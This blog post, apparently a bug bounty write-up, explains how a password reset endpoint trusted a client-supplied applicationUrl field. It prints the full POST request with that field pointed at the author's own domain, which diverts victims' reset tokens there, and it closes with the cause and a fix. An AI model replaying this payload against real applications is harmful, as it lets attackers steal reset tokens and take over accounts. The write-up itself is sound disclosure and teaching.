DEV Community

Mohamed Zain

How I Earned $1000 from a Password Reset Vulnerability

This is a small but interesting vulnerability. Let me describe how it works in a password reset feature.
Password reset functionality is among the most sensitive features in any web application. A small mistake in how the reset link is constructed can easily lead to account takeover.
In this article, I will walk you through a real-world vulnerability I found, involving a parameter called applicationUrl, which allowed me to manipulate the password reset link and steal the reset token.
The backend accepted a parameter named applicationUrl, which was supposed to define the base URL of the application.

The problem: the server trusted whatever value was supplied in this field.
This meant that I could inject any URL I wanted into the password reset link that gets emailed to the user.

When I submitted a password reset request, the following POST request was sent:

POST /server.php HTTP/1.1
Host: 1337.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
Origin: https://1337.com
Connection: close
Referer: https://1337/login.php
Cookie: /*cookie*/

D={"C":"Gpf_Rpc_Server","M":"run","requests":[{"C":"Gpf_Auth_Service","M":"requestNewPassword","fields":[["name","value"],["Id",""],["username","email@email.com"],["lost_pw_captcha","F3F3"],["applicationUrl","https://zayn1337.com/"]]}],"S":"dvkegseu3erupmvpkc6u3t7k7i"}

I changed only one field, applicationUrl = https://zayn1337.com, and the server did not reject it.
When the victim receives the password reset email, the link inside is expected to look like this:
https://1337.com/reset?token=XYZ
But because the server used my injected URL, the link became:
https://zayn1337.com/?token=XYZ

The token is still generated by the real application.
But it is sent to my domain because I control the applicationUrl parameter.
Once the victim clicks the link, their browser sends the token directly to my server as a query-string parameter, where it shows up in the request log.

Why This Happens

The backend should never use untrusted input when constructing a security-sensitive URL.
In this case:
The password reset link was built dynamically from client-supplied data.
No validation or allowlisting was performed on applicationUrl.
The developers likely intended applicationUrl for customization, but accidentally exposed it to anyone who can submit the reset form.
The fix is to take the base URL from server-side configuration, or, if the parameter really is needed, to accept only values whose origin exactly matches an allowlist of known hosts.


This vulnerability shows that small mistakes can create big security risks. I hope this writeup helps others.
